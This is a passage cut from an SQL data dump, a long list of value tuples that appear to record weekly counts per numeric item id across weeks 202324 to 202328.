,'202324',15),(473,1,'202324',15),(487,1,'202324',15),(1592,1,'202324',15),(1596,1,'202324',15),(4420,1,'202324',15),(84,1,'202324',16),(1544,1,'202324',16),(1598,1,'202324',16),(1602,1,'202324',16),(1600,1,'202324',18),(3781,1,'202324',18),(89,1,'202324',19),(76,1,'202324',20),(1582,1,'202324',22),(72,1,'202324',23),(91,1,'202324',24),(5163,1,'202324',24),(68,1,'202324',27),(1588,1,'202324',28),(1586,1,'202324',30),(2904,1,'202324',95),(80,1,'202324',120),(9,1,'202324',749),(102,1,'202325',1),(1703,1,'202325',1),(1713,1,'202325',1),(1726,1,'202325',1),(1751,1,'202325',1),(1780,1,'202325',1),(2063,1,'202325',1),(2252,1,'202325',1),(2704,1,'202325',1),(2964,1,'202325',1),(2991,1,'202325',1),(3097,1,'202325',1),(3104,1,'202325',1),(3253,1,'202325',1),(3269,1,'202325',1),(3275,1,'202325',1),(3278,1,'202325',1),(3287,1,'202325',1),(3531,1,'202325',1),(4329,1,'202325',1),(4387,1,'202325',1),(4396,1,'202325',1),(4408,1,'202325',1),(4542,1,'202325',1),(4551,1,'202325',1),(4556,1,'202325',1),(4677,1,'202325',1),(4685,1,'202325',1),(4688,1,'202325',1),(4709,1,'202325',1),(4712,1,'202325',1),(4862,1,'202325',1),(4870,1,'202325',1),(4874,1,'202325',1),(4888,1,'202325',1),(5020,1,'202325',1),(5024,1,'202325',1),(5028,1,'202325',1),(5037,1,'202325',1),(5046,1,'202325',1),(5050,1,'202325',1),(5054,1,'202325',1),(5122,1,'202325',1),(5298,1,'202325',1),(5301,1,'202325',1),(106,1,'202325',2),(1701,1,'202325',2),(1705,1,'202325',2),(1715,1,'202325',2),(1739,1,'202325',2),(1743,1,'202325',2),(1747,1,'202325',2),(1749,1,'202325',2),(1768,1,'202325',2),(1776,1,'202325',2),(1778,1,'202325',2),(2148,1,'202325',2),(2150,1,'202325',2),(2293,1,'202325',2),(2296,1,'202325',2),(2558,1,'202325',2),(2748,1,'202325',2),(3023,1,'202325',2),(3041,1,'202325',2),(3109,1,'202325',2),(3127,1,'202325',2),(3240,1,'202325',2),(3259,1,'202325',2),(3261,1,'202325',2),(3265,1,'202325',2),(3316,1,'202325',2),(3430,1,'202325',2),(3479,1,'202325',2),(3486,1,'202325',2),(3541,1,'202325',2),(3721,1,'202325',2),(3735,1,'202325',2),(3738,1,'202325',2),(3742,1,'202325',2),(3771,1,'202325',2),(4301,1,'202325',2),(4326,1,'202325',2),(4332,1,'202325',2),(4335,1,'202325',2),(4338,1,'202325',2),(4368,1,'202325',2),(4373,1,'202325',2),(4377,1,'202325',2),(4440,1,'202325',2),(4454,1,'202325',2),(4681,1,'202325',2),(4694,1,'202325',2),(4797,1,'202325',2),(4858,1,'202325',2),(5042,1,'202325',2),(5058,1,'202325',2),(5071,1,'202325',2),(5146,1,'202325',2),(5153,1,'202325',2),(5157,1,'202325',2),(5259,1,'202325',2),(5264,1,'202325',2),(5292,1,'202325',2),(482,1,'202325',3),(1606,1,'202325',3),(1695,1,'202325',3),(1699,1,'202325',3),(1720,1,'202325',3),(1730,1,'202325',3),(1734,1,'202325',3),(1737,1,'202325',3),(1782,1,'202325',3),(2154,1,'202325',3),(2156,1,'202325',3),(2165,1,'202325',3),(2178,1,'202325',3),(2248,1,'202325',3),(2813,1,'202325',3),(2956,1,'202325',3),(2965,1,'202325',3),(2993,1,'202325',3),(3027,1,'202325',3),(3063,1,'202325',3),(3226,1,'202325',3),(3243,1,'202325',3),(3247,1,'202325',3),(3271,1,'202325',3),(3273,1,'202325',3),(3282,1,'202325',3),(3307,1,'202325',3),(3438,1,'202325',3),(3489,1,'202325',3),(3752,1,'202325',3),(4357,1,'202325',3),(4363,1,'202325',3),(4404,1,'202325',3),(4416,1,'202325',3),(4424,1,'202325',3),(4428,1,'202325',3),(4514,1,'202325',3),(4517,1,'202325',3),(4546,1,'202325',3),(4591,1,'202325',3),(4648,1,'202325',3),(4654,1,'202325',3),(4663,1,'202325',3),(4697,1,'202325',3),(4703,1,'202325',3),(4741,1,'202325',3),(4750,1,'202325',3),(4753,1,'202325',3),(4765,1,'202325',3),(4792,1,'202325',3),(4866,1,'202325',3),(4878,1,'202325',3),(4893,1,'202325',3),(4983,1,'202325',3),(4988,1,'202325',3),(4996,1,'202325',3),(5067,1,'202325',3),(5101,1,'202325',3),(5134,1,'202325',3),(5248,1,'202325',3),(5289,1,'202325',3),(5295,1,'202325',3),(5317,1,'202325',3),(5326,1,'202325',3),(5330,1,'202325',3),(471,1,'202325',4),(479,1,'202325',4),(1590,1,'202325',4),(1711,1,'202325',4),(1718,1,'202325',4),(1732,1,'202325',4),(1741,1,'202325',4),(2152,1,'202325',4),(2159,1,'202325',4),(2617,1,'202325',4),(2751,1,'202325',4),(2989,1,'202325',4),(3066,1,'202325',4),(3087,1,'202325',4),(3092,1,'202325',4),(3107,1,'202325',4),(3229,1,'202325',4),(3263,1,'202325',4),(3313,1,'202325',4),(3534,1,'202325',4),(3710,1,'202325',4),(3714,1,'202325',4),(3731,1,'202325',4),(3749,1,'202325',4),(4323,1,'202325',4),(4444,1,'202325',4),(4612,1,'202325',4),(4651,1,'202325',4),(4674,1,'202325',4),(4722,1,'202325',4),(4744,1,'202325',4),(4756,1,'202325',4),(4976,1,'202325',4),(4977,1,'202325',4),(5076,1,'202325',4),(5080,1,'202325',4),(5131,1,'202325',4),(5140,1,'202325',4),(5256,1,'202325',4),(5271,1,'202325',4),(5310,1,'202325',4),(5323,1,'202325',4),(5363,1,'202325',4),(478,1,'202325',5),(481,1,'202325',5),(485,1,'202325',5),(486,1,'202325',5),(488,1,'202325',5),(1770,1,'202325',5),(1772,1,'202325',5),(2297,1,'202325',5),(2658,1,'202325',5),(3006,1,'202325',5),(3045,1,'202325',5),(3079,1,'202325',5),(3117,1,'202325',5),(3251,1,'202325',5),(3498,1,'202325',5),(3724,1,'202325',5),(4391,1,'202325',5),(4436,1,'202325',5),(4566,1,'202325',5),(4608,1,'202325',5),(4660,1,'202325',5),(4897,1,'202325',5),(5128,1,'202325',5),(5137,1,'202325',5),(5268,1,'202325',5),(5320,1,'202325',5),(469,1,'202325',6),(476,1,'202325',6),(477,1,'202325',6),(480,1,'202325',6),(484,1,'202325',6),(1584,1,'202325',6),(1709,1,'202325',6),(1724,1,'202325',6),(1728,1,'202325',6),(1774,1,'202325',6),(2911,1,'202325',6),(3069,1,'202325',6),(3124,1,'202325',6),(3285,1,'202325',6),(3482,1,'202325',6),(4400,1,'202325',6),(4645,1,'202325',6),(4700,1,'202325',6),(4747,1,'202325',6),(4759,1,'202325',6),(4762,1,'202325',6),(4776,1,'202325',6),(4802,1,'202325',6),(5125,1,'202325',6),(5276,1,'202325',6),(5304,1,'202325',6),(5314,1,'202325',6),(470,1,'202325',7),(483,1,'202325',7),(570,1,'202325',7),(1745,1,'202325',7),(2309,1,'202325',7),(2609,1,'202325',7),(2775,1,'202325',7),(3004,1,'202325',7),(3083,1,'202325',7),(4341,1,'202325',7),(4587,1,'202325',7),(4706,1,'202325',7),(4771,1,'202325',7),(1592,1,'202325',8),(1604,1,'202325',8),(1707,1,'202325',8),(1722,1,'202325',8),(1766,1,'202325',8),(2804,1,'202325',8),(2809,1,'202325',8),(3034,1,'202325',8),(3072,1,'202325',8),(4448,1,'202325',8),(5033,1,'202325',8),(5307,1,'202325',8),(467,1,'202325',9),(472,1,'202325',9),(1614,1,'202325',9),(3005,1,'202325',9),(3060,1,'202325',9),(3090,1,'202325',9),(3102,1,'202325',9),(3245,1,'202325',9),(3290,1,'202325',9),(3297,1,'202325',9),(4238,1,'202325',9),(4457,1,'202325',9),(4657,1,'202325',9),(4980,1,'202325',9),(5253,1,'202325',9),(335,1,'202325',10),(487,1,'202325',10),(1598,1,'202325',10),(1610,1,'202325',10),(3038,1,'202325',10),(4520,1,'202325',10),(4529,1,'202325',10),(4768,1,'202325',10),(2769,1,'202325',11),(3777,1,'202325',11),(4420,1,'202325',11),(4524,1,'202325',11),(5062,1,'202325',11),(5163,1,'202325',11),(3030,1,'202325',12),(5353,1,'202325',12),(74,1,'202325',13),(474,1,'202325',13),(1594,1,'202325',13),(1608,1,'202325',13),(1612,1,'202325',13),(2457,1,'202325',13),(3781,1,'202325',13),(84,1,'202325',14),(1586,1,'202325',14),(1596,1,'202325',14),(2503,1,'202325',14),(4412,1,'202325',14),(5334,1,'202325',15),(5356,1,'202325',15),(87,1,'202325',16),(468,1,'202325',16),(473,1,'202325',16),(1544,1,'202325',16),(5280,1,'202325',16),(5359,1,'202325',16),(108,1,'202325',17),(1600,1,'202325',18),(3764,1,'202325',18),(4930,1,'202325',19),(1582,1,'202325',20),(1588,1,'202325',21),(1602,1,'202325',23),(72,1,'202325',24),(76,1,'202325',28),(89,1,'202325',30),(68,1,'202325',31),(91,1,'202325',33),(2904,1,'202325',96),(80,1,'202325',114),(9,1,'202325',793),(106,1,'202326',1),(1739,1,'202326',1),(1743,1,'202326',1),(1768,1,'202326',1),(3034,1,'202326',1),(3087,1,'202326',1),(3109,1,'202326',1),(3280,1,'202326',1),(3285,1,'202326',1),(3531,1,'202326',1),(4357,1,'202326',1),(4368,1,'202326',1),(4404,1,'202326',1),(4424,1,'202326',1),(4440,1,'202326',1),(4591,1,'202326',1),(4792,1,'202326',1),(4797,1,'202326',1),(4858,1,'202326',1),(4862,1,'202326',1),(4878,1,'202326',1),(5020,1,'202326',1),(471,1,'202326',2),(483,1,'202326',2),(1705,1,'202326',2),(1707,1,'202326',2),(1709,1,'202326',2),(1713,1,'202326',2),(1720,1,'202326',2),(1726,1,'202326',2),(1734,1,'202326',2),(2063,1,'202326',2),(2161,1,'202326',2),(2252,1,'202326',2),(3104,1,'202326',2),(3247,1,'202326',2),(3259,1,'202326',2),(3273,1,'202326',2),(3278,1,'202326',2),(3430,1,'202326',2),(3438,1,'202326',2),(3724,1,'202326',2),(3731,1,'202326',2),(3735,1,'202326',2),(3749,1,'202326',2),(4363,1,'202326',2),(4387,1,'202326',2),(4396,1,'202326',2),(4408,1,'202326',2),(4428,1,'202326',2),(4546,1,'202326',2),(4587,1,'202326',2),(4722,1,'202326',2),(4870,1,'202326',2),(4893,1,'202326',2),(4897,1,'202326',2),(4988,1,'202326',2),(5037,1,'202326',2),(5326,1,'202326',2),(5330,1,'202326',2),(102,1,'202326',3),(1695,1,'202326',3),(1697,1,'202326',3),(1701,1,'202326',3),(1715,1,'202326',3),(1730,1,'202326',3),(1732,1,'202326',3),(1741,1,'202326',3),(1747,1,'202326',3),(1770,1,'202326',3),(1772,1,'202326',3),(1774,1,'202326',3),(1782,1,'202326',3),(2152,1,'202326',3),(2154,1,'202326',3),(2156,1,'202326',3),(2248,1,'202326',3),(2297,1,'202326',3),(2558,1,'202326',3),(2748,1,'202326',3),(2775,1,'202326',3),(2965,1,'202326',3),(2989,1,'202326',3),(2993,1,'202326',3),(3023,1,'202326',3),(3072,1,'202326',3),(3097,1,'202326',3),(3127,1,'202326',3),(3243,1,'202326',3),(3249,1,'202326',3),(3251,1,'202326',3),(3261,1,'202326',3),(3267,1,'202326',3),(3269,1,'202326',3),(3271,1,'202326',3),(3275,1,'202326',3),(3282,1,'202326',3),(3290,1,'202326',3),(3297,1,'202326',3),(3316,1,'202326',3),(3486,1,'202326',3),(3721,1,'202326',3),(3727,1,'202326',3),(3742,1,'202326',3),(3746,1,'202326',3),(4323,1,'202326',3),(4326,1,'202326',3),(4338,1,'202326',3),(4377,1,'202326',3),(4382,1,'202326',3),(4400,1,'202326',3),(4432,1,'202326',3),(4517,1,'202326',3),(4663,1,'202326',3),(4668,1,'202326',3),(4691,1,'202326',3),(4700,1,'202326',3),(4747,1,'202326',3),(4756,1,'202326',3),(4762,1,'202326',3),(4866,1,'202326',3),(4874,1,'202326',3),(4983,1,'202326',3),(5024,1,'202326',3),(5028,1,'202326',3),(5042,1,'202326',3),(5050,1,'202326',3),(472,1,'202326',4),(477,1,'202326',4),(481,1,'202326',4),(482,1,'202326',4),(1699,1,'202326',4),(1711,1,'202326',4),(1722,1,'202326',4),(1749,1,'202326',4),(1751,1,'202326',4),(1776,1,'202326',4),(1780,1,'202326',4),(2148,1,'202326',4),(2813,1,'202326',4),(2911,1,'202326',4),(2964,1,'202326',4),(3041,1,'202326',4),(3045,1,'202326',4),(3063,1,'202326',4),(3079,1,'202326',4),(3096,1,'202326',4),(3117,1,'202326',4),(3240,1,'202326',4),(3253,1,'202326',4),(3257,1,'202326',4),(3263,1,'202326',4),(3265,1,'202326',4),(3287,1,'202326',4),(3479,1,'202326',4),(3541,1,'202326',4),(3714,1,'202326',4),(3774,1,'202326',4),(3777,1,'202326',4),(4275,1,'202326',4),(4335,1,'202326',4),(4341,1,'202326',4),(4373,1,'202326',4),(4391,1,'202326',4),(4514,1,'202326',4),(4566,1,'202326',4),(4648,1,'202326',4),(4654,1,'202326',4),(4660,1,'202326',4),(4681,1,'202326',4),(4688,1,'202326',4),(4706,1,'202326',4),(4712,1,'202326',4),(4744,1,'202326',4),(4750,1,'202326',4),(4765,1,'202326',4),(4768,1,'202326',4),(4802,1,'202326',4),(4883,1,'202326',4),(4888,1,'202326',4),(5054,1,'202326',4),(5067,1,'202326',4),(5071,1,'202326',4),(5101,1,'202326',4),(5137,1,'202326',4),(5140,1,'202326',4),(5157,1,'202326',4),(5259,1,'202326',4),(5268,1,'202326',4),(476,1,'202326',5),(478,1,'202326',5),(479,1,'202326',5),(480,1,'202326',5),(570,1,'202326',5),(1590,1,'202326',5),(1703,1,'202326',5),(1778,1,'202326',5),(2296,1,'202326',5),(2617,1,'202326',5),(2658,1,'202326',5),(2804,1,'202326',5),(2991,1,'202326',5),(3027,1,'202326',5),(3066,1,'202326',5),(3069,1,'202326',5),(3092,1,'202326',5),(3124,1,'202326',5),(3226,1,'202326',5),(3307,1,'202326',5),(3482,1,'202326',5),(3489,1,'202326',5),(3498,1,'202326',5),(3752,1,'202326',5),(3771,1,'202326',5),(4301,1,'202326',5),(4329,1,'202326',5),(4332,1,'202326',5),(4436,1,'202326',5),(4444,1,'202326',5),(4529,1,'202326',5),(4582,1,'202326',5),(4612,1,'202326',5),(4645,1,'202326',5),(4651,1,'202326',5),(4657,1,'202326',5),(4741,1,'202326',5),(4753,1,'202326',5),(4759,1,'202326',5),(4771,1,'202326',5),(4976,1,'202326',5),(4977,1,'202326',5),(4980,1,'202326',5),(5128,1,'202326',5),(5146,1,'202326',5),(5271,1,'202326',5),(5276,1,'202326',5),(5298,1,'202326',5),(484,1,'202326',6),(485,1,'202326',6),(486,1,'202326',6),(1737,1,'202326',6),(2150,1,'202326',6),(2165,1,'202326',6),(2178,1,'202326',6),(2293,1,'202326',6),(2704,1,'202326',6),(2751,1,'202326',6),(2801,1,'202326',6),(3006,1,'202326',6),(3038,1,'202326',6),(3090,1,'202326',6),(3229,1,'202326',6),(4677,1,'202326',6),(4685,1,'202326',6),(4697,1,'202326',6),(4776,1,'202326',6),(4996,1,'202326',6),(5080,1,'202326',6),(5125,1,'202326',6),(5134,1,'202326',6),(5153,1,'202326',6),(5248,1,'202326',6),(5314,1,'202326',6),(5353,1,'202326',6),(5356,1,'202326',6),(5363,1,'202326',6),(488,1,'202326',7),(1724,1,'202326',7),(1728,1,'202326',7),(2309,1,'202326',7),(2809,1,'202326',7),(2956,1,'202326',7),(3005,1,'202326',7),(3102,1,'202326',7),(3534,1,'202326',7),(4524,1,'202326',7),(4542,1,'202326',7),(5076,1,'202326',7),(5122,1,'202326',7),(5253,1,'202326',7),(5289,1,'202326',7),(5292,1,'202326',7),(5310,1,'202326',7),(1584,1,'202326',8),(1718,1,'202326',8),(3710,1,'202326',8),(3738,1,'202326',8),(4416,1,'202326',8),(4674,1,'202326',8),(4694,1,'202326',8),(5058,1,'202326',8),(5264,1,'202326',8),(5301,1,'202326',8),(5317,1,'202326',8),(5320,1,'202326',8),(5334,1,'202326',8),(2159,1,'202326',9),(3107,1,'202326',9),(3245,1,'202326',9),(3313,1,'202326',9),(4448,1,'202326',9),(4551,1,'202326',9),(4556,1,'202326',9),(4608,1,'202326',9),(4703,1,'202326',9),(4709,1,'202326',9),(5046,1,'202326',9),(5131,1,'202326',9),(5280,1,'202326',9),(5295,1,'202326',9),(5307,1,'202326',9),(5359,1,'202326',9),(74,1,'202326',10),(467,1,'202326',10),(469,1,'202326',10),(3781,1,'202326',10),(4457,1,'202326',10),(4520,1,'202326',10),(5323,1,'202326',10),(487,1,'202326',11),(1592,1,'202326',11),(1604,1,'202326',11),(1606,1,'202326',11),(2503,1,'202326',11),(2609,1,'202326',11),(3004,1,'202326',11),(3060,1,'202326',11),(4238,1,'202326',11),(4930,1,'202326',11),(5033,1,'202326',11),(108,1,'202326',12),(474,1,'202326',12),(1745,1,'202326',12),(2457,1,'202326',12),(3030,1,'202326',12),(3083,1,'202326',12),(3764,1,'202326',12),(5062,1,'202326',12),(1610,1,'202326',13),(4412,1,'202326',13),(5304,1,'202326',13),(87,1,'202326',14),(473,1,'202326',14),(1614,1,'202326',14),(2769,1,'202326',14),(4420,1,'202326',14),(84,1,'202326',15),(1608,1,'202326',15),(4454,1,'202326',15),(470,1,'202326',16),(1594,1,'202326',17),(1766,1,'202326',17),(335,1,'202326',18),(1544,1,'202326',18),(1598,1,'202326',18),(1602,1,'202326',18),(5163,1,'202326',18),(1582,1,'202326',19),(1612,1,'202326',20),(89,1,'202326',22),(1596,1,'202326',22),(1600,1,'202326',22),(5256,1,'202326',22),(1586,1,'202326',25),(1588,1,'202326',26),(76,1,'202326',28),(91,1,'202326',28),(68,1,'202326',29),(72,1,'202326',30),(468,1,'202326',31),(2904,1,'202326',94),(80,1,'202326',109),(9,1,'202326',778),(106,1,'202327',1),(110,1,'202327',1),(479,1,'202327',1),(1782,1,'202327',1),(3229,1,'202327',1),(3243,1,'202327',1),(3249,1,'202327',1),(3257,1,'202327',1),(3275,1,'202327',1),(3479,1,'202327',1),(3482,1,'202327',1),(3738,1,'202327',1),(3746,1,'202327',1),(3749,1,'202327',1),(3774,1,'202327',1),(3777,1,'202327',1),(4275,1,'202327',1),(4368,1,'202327',1),(4396,1,'202327',1),(4440,1,'202327',1),(4524,1,'202327',1),(4546,1,'202327',1),(4551,1,'202327',1),(4648,1,'202327',1),(4654,1,'202327',1),(4657,1,'202327',1),(4744,1,'202327',1),(4792,1,'202327',1),(4888,1,'202327',1),(469,1,'202327',2),(477,1,'202327',2),(480,1,'202327',2),(485,1,'202327',2),(1707,1,'202327',2),(1713,1,'202327',2),(1715,1,'202327',2),(2150,1,'202327',2),(2293,1,'202327',2),(2296,1,'202327',2),(2617,1,'202327',2),(2748,1,'202327',2),(2993,1,'202327',2),(3027,1,'202327',2),(3107,1,'202327',2),(3109,1,'202327',2),(3247,1,'202327',2),(3253,1,'202327',2),(3261,1,'202327',2),(3269,1,'202327',2),(3316,1,'202327',2),(3486,1,'202327',2),(3531,1,'202327',2),(3721,1,'202327',2),(3731,1,'202327',2),(3752,1,'202327',2),(4332,1,'202327',2),(4341,1,'202327',2),(4357,1,'202327',2),(4363,1,'202327',2),(4377,1,'202327',2),(4408,1,'202327',2),(4428,1,'202327',2),(4436,1,'202327',2),(4681,1,'202327',2),(4691,1,'202327',2),(4709,1,'202327',2),(4797,1,'202327',2),(4862,1,'202327',2),(4866,1,'202327',2),(4878,1,'202327',2),(4883,1,'202327',2),(4897,1,'202327',2),(5271,1,'202327',2),(5330,1,'202327',2),(476,1,'202327',3),(478,1,'202327',3),(482,1,'202327',3),(484,1,'202327',3),(1584,1,'202327',3),(1697,1,'202327',3),(1705,1,'202327',3),(1720,1,'202327',3),(1732,1,'202327',3),(1747,1,'202327',3),(1770,1,'202327',3),(2148,1,'202327',3),(2152,1,'202327',3),(2156,1,'202327',3),(2161,1,'202327',3),(2751,1,'202327',3),(2775,1,'202327',3),(2911,1,'202327',3),(2964,1,'202327',3),(3038,1,'202327',3),(3041,1,'202327',3),(3072,1,'202327',3),(3079,1,'202327',3),(3096,1,'202327',3),(3104,1,'202327',3),(3117,1,'202327',3),(3259,1,'202327',3),(3280,1,'202327',3),(3282,1,'202327',3),(3287,1,'202327',3),(3297,1,'202327',3),(3438,1,'202327',3),(3498,1,'202327',3),(3735,1,'202327',3),(4326,1,'202327',3),(4329,1,'202327',3),(4373,1,'202327',3),(4382,1,'202327',3),(4404,1,'202327',3),(4529,1,'202327',3),(4556,1,'202327',3),(4591,1,'202327',3),(4651,1,'202327',3),(4668,1,'202327',3),(4685,1,'202327',3),(4712,1,'202327',3),(4870,1,'202327',3),(4893,1,'202327',3),(5020,1,'202327',3),(5028,1,'202327',3),(5042,1,'202327',3),(5101,1,'202327',3),(5157,1,'202327',3),(5248,1,'202327',3),(5256,1,'202327',3),(5259,1,'202327',3),(5289,1,'202327',3),(5292,1,'202327',3),(5298,1,'202327',3),(5301,1,'202327',3),(335,1,'202327',4),(471,1,'202327',4),(483,1,'202327',4),(1590,1,'202327',4),(1699,1,'202327',4),(1726,1,'202327',4),(1730,1,'202327',4),(1734,1,'202327',4),(1739,1,'202327',4),(1768,1,'202327',4),(1772,1,'202327',4),(1778,1,'202327',4),(2178,1,'202327',4),(2248,1,'202327',4),(2252,1,'202327',4),(2801,1,'202327',4),(2813,1,'202327',4),(2956,1,'202327',4),(2989,1,'202327',4),(3087,1,'202327',4),(3102,1,'202327',4),(3226,1,'202327',4),(3240,1,'202327',4),(3265,1,'202327',4),(3267,1,'202327',4),(3285,1,'202327',4),(3313,1,'202327',4),(3430,1,'202327',4),(3489,1,'202327',4),(3534,1,'202327',4),(3541,1,'202327',4),(3724,1,'202327',4),(3727,1,'202327',4),(3742,1,'202327',4),(4323,1,'202327',4),(4387,1,'202327',4),(4432,1,'202327',4),(4448,1,'202327',4),(4517,1,'202327',4),(4542,1,'202327',4),(4566,1,'202327',4),(4582,1,'202327',4),(4660,1,'202327',4),(4663,1,'202327',4),(4674,1,'202327',4),(4703,1,'202327',4),(4706,1,'202327',4),(4741,1,'202327',4),(4747,1,'202327',4),(4750,1,'202327',4),(4756,1,'202327',4),(4765,1,'202327',4),(4802,1,'202327',4),(4976,1,'202327',4),(5058,1,'202327',4),(5080,1,'202327',4),(5153,1,'202327',4),(5326,1,'202327',4),(5363,1,'202327',4),(102,1,'202327',5),(481,1,'202327',5),(488,1,'202327',5),(570,1,'202327',5),(1606,1,'202327',5),(1703,1,'202327',5),(1709,1,'202327',5),(1737,1,'202327',5),(1749,1,'202327',5),(1751,1,'202327',5),(1774,1,'202327',5),(1776,1,'202327',5),(2063,1,'202327',5),(2165,1,'202327',5),(2297,1,'202327',5),(2309,1,'202327',5),(2558,1,'202327',5),(2658,1,'202327',5),(2704,1,'202327',5),(2965,1,'202327',5),(2991,1,'202327',5),(3045,1,'202327',5),(3063,1,'202327',5),(3092,1,'202327',5),(3097,1,'202327',5),(3263,1,'202327',5),(3271,1,'202327',5),(3278,1,'202327',5),(3307,1,'202327',5),(3710,1,'202327',5),(3714,1,'202327',5),(4335,1,'202327',5),(4338,1,'202327',5),(4416,1,'202327',5),(4424,1,'202327',5),(4645,1,'202327',5),(4722,1,'202327',5),(4988,1,'202327',5),(5024,1,'202327',5),(5046,1,'202327',5),(5137,1,'202327',5),(5140,1,'202327',5),(5146,1,'202327',5),(5264,1,'202327',5),(5304,1,'202327',5),(5310,1,'202327',5),(5353,1,'202327',5),(74,1,'202327',6),(84,1,'202327',6),(108,1,'202327',6),(486,1,'202327',6),(1695,1,'202327',6),(1711,1,'202327',6),(1743,1,'202327',6),(2154,1,'202327',6),(2609,1,'202327',6),(3004,1,'202327',6),(3023,1,'202327',6),(3066,1,'202327',6),(3245,1,'202327',6),(3251,1,'202327',6),(3273,1,'202327',6),(3771,1,'202327',6),(4301,1,'202327',6),(4454,1,'202327',6),(4514,1,'202327',6),(4587,1,'202327',6),(4612,1,'202327',6),(4677,1,'202327',6),(4694,1,'202327',6),(4697,1,'202327',6),(4768,1,'202327',6),(4771,1,'202327',6),(4776,1,'202327',6),(4874,1,'202327',6),(4983,1,'202327',6),(4996,1,'202327',6),(5054,1,'202327',6),(5067,1,'202327',6),(5125,1,'202327',6),(5128,1,'202327',6),(5253,1,'202327',6),(5268,1,'202327',6),(5295,1,'202327',6),(5314,1,'202327',6),(5323,1,'202327',6),(5359,1,'202327',6),(87,1,'202327',7),(467,1,'202327',7),(472,1,'202327',7),(1592,1,'202327',7),(1594,1,'202327',7),(1701,1,'202327',7),(1718,1,'202327',7),(1722,1,'202327',7),(1724,1,'202327',7),(1741,1,'202327',7),(1745,1,'202327',7),(1780,1,'202327',7),(3034,1,'202327',7),(3069,1,'202327',7),(3127,1,'202327',7),(3290,1,'202327',7),(4238,1,'202327',7),(4400,1,'202327',7),(4444,1,'202327',7),(4520,1,'202327',7),(4762,1,'202327',7),(5033,1,'202327',7),(5037,1,'202327',7),(5050,1,'202327',7),(5122,1,'202327',7),(5134,1,'202327',7),(470,1,'202327',8),(1600,1,'202327',8),(2804,1,'202327',8),(3006,1,'202327',8),(3083,1,'202327',8),(4420,1,'202327',8),(4977,1,'202327',8),(4980,1,'202327',8),(5276,1,'202327',8),(5280,1,'202327',8),(5307,1,'202327',8),(5317,1,'202327',8),(5356,1,'202327',8),(1598,1,'202327',9),(1604,1,'202327',9),(1766,1,'202327',9),(2457,1,'202327',9),(2503,1,'202327',9),(3124,1,'202327',9),(4391,1,'202327',9),(4700,1,'202327',9),(4753,1,'202327',9),(4930,1,'202327',9),(5062,1,'202327',9),(5071,1,'202327',9),(5076,1,'202327',9),(5334,1,'202327',9),(487,1,'202327',10),(1596,1,'202327',10),(2809,1,'202327',10),(3060,1,'202327',10),(4412,1,'202327',10),(1544,1,'202327',11),(1614,1,'202327',11),(3005,1,'202327',11),(3090,1,'202327',11),(3764,1,'202327',11),(4608,1,'202327',12),(5320,1,'202327',12),(1610,1,'202327',13),(2159,1,'202327',13),(3781,1,'202327',13),(4457,1,'202327',13),(89,1,'202327',14),(1586,1,'202327',14),(1608,1,'202327',14),(2769,1,'202327',14),(3030,1,'202327',14),(1728,1,'202327',15),(474,1,'202327',16),(1602,1,'202327',16),(1612,1,'202327',16),(5163,1,'202327',16),(76,1,'202327',17),(91,1,'202327',17),(473,1,'202327',17),(1582,1,'202327',18),(5131,1,'202327',18),(468,1,'202327',19),(1588,1,'202327',19),(4759,1,'202327',20),(68,1,'202327',21),(72,1,'202327',25),(2904,1,'202327',46),(80,1,'202327',111),(9,1,'202327',745),(106,1,'202328',1),(1705,1,'202328',1),(1713,1,'202328',1),(1737,1,'202328',1),(1778,1,'202328',1),(1782,1,'202328',1),(2252,1,'202328',1),(2297,1,'202328',1),(2965,1,'202328',1),(2993,1,'202328',1),(3243,1,'202328',1),(3249,1,'202328',1),(3261,1,'202328',1),(3265,1,'202328',1),(3267,1,'202328',1),(3275,1,'202328',1),(3282,1,'202328',1),(3297,1,'202328',1),(3482,1,'202328',1),(3714,1,'202328',1),(3746,1,'202328',1),(3771,1,'202328',1),(3777,1,'202328',1),(4382,1,'202328',1),(4400,1,'202328',1),(4404,1,'202328',1),(4408,1,'202328',1),(4514,1,'202328',1),(4517,1,'202328',1),(4582,1,'202328',1),(4648,1,'202328',1),(4660,1,'202328',1),(4668,1,'202328',1),(4685,1,'202328',1),(4694,1,'202328',1),(4712,1,'202328',1),(4797,1,'202328',1),(4802,1,'202328',1),(4878,1,'202328',1),(5028,1,'202328',1),(5137,1,'202328',1),(5153,1,'202328',1),(5248,1,'202328',1),(5301,1,'202328',1),(5304,1,'202328',1),(110,1,'202328',2),(471,1,'202328',2),(476,1,'202328',2),(484,1,'202328',2),(1697,1,'202328',2),(1701,1,'202328',2),(1711,1,'202328',2),(1730,1,'202328',2),(1732,1,'202328',2),(1741,1,'202328',2),(1747,1,'202328',2),(1749,1,'202328',2),(1751,1,'202328',2),(1772,1,'202328',2),(1780,1,'202328',2),(2148,1,'202328',2),(2154,1,'202328',2),(2156,1,'202328',2),(2161,1,'202328',2),(2165,1,'202328',2),(2248,1,'202328',2),(2704,1,'202328',2),(2748,1,'202328',2),(2991,1,'202328',2),(3072,1,'202328',2),(3087,1,'202328',2),(3097,1,'202328',2),(3109,1,'202328',2),(3117,1,'202328',2),(3124,1,'202328',2),(3127,1,'202328',2),(3226,1,'202328',2),(3251,1,'202328',2),(3253,1,'202328',2),(3280,1,'202328',2),(3287,1,'202328',2),(3430,1,'202328',2),(3531,1,'202328',2),(3710,1,'202328',2),(3735,1,'202328',2),(3738,1,'202328',2),(3742,1,'202328',2),(4275,1,'202328',2),(4335,1,'202328',2),(4363,1,'202328',2),(4368,1,'202328',2),(4377,1,'202328',2),(4396,1,'202328',2),(4432,1,'202328',2),(4436,1,'202328',2),(4454,1,'202328',2),(4542,1,'202328',2),(4551,1,'202328',2),(4587,1,'202328',2),(4657,1,'202328',2),(4681,1,'202328',2),(4688,1,'202328',2),(4697,1,'202328',2),(4741,1,'202328',2),(4744,1,'202328',2),(4756,1,'202328',2),(4792,1,'202328',2),(4858,1,'202328',2),(4883,1,'202328',2),(4888,1,'202328',2),(4897,1,'202328',2),(4996,1,'202328',2),(5020,1,'202328',2),(5037,1,'202328',2),(5058,1,'202328',2),(5125,1,'202328',2),(5128,1,'202328',2),(5298,1,'202328',2),(5317,1,'202328',2),(5323,1,'202328',2),(5363,1,'202328',2),(481,1,'202328',3),(485,1,'202328',3),(1590,1,'202328',3),(1695,1,'202328',3),(1739,1,'202328',3),(1743,1,'202328',3),(1776,1,'202328',3),(2063,1,'202328',3),(2152,1,'202328',3),(2558,1,'202328',3),(2956,1,'202328',3),(2989,1,'202328',3),(3006,1,'202328',3),(3023,1,'202328',3),(3027,1,'202328',3),(3034,1,'202328',3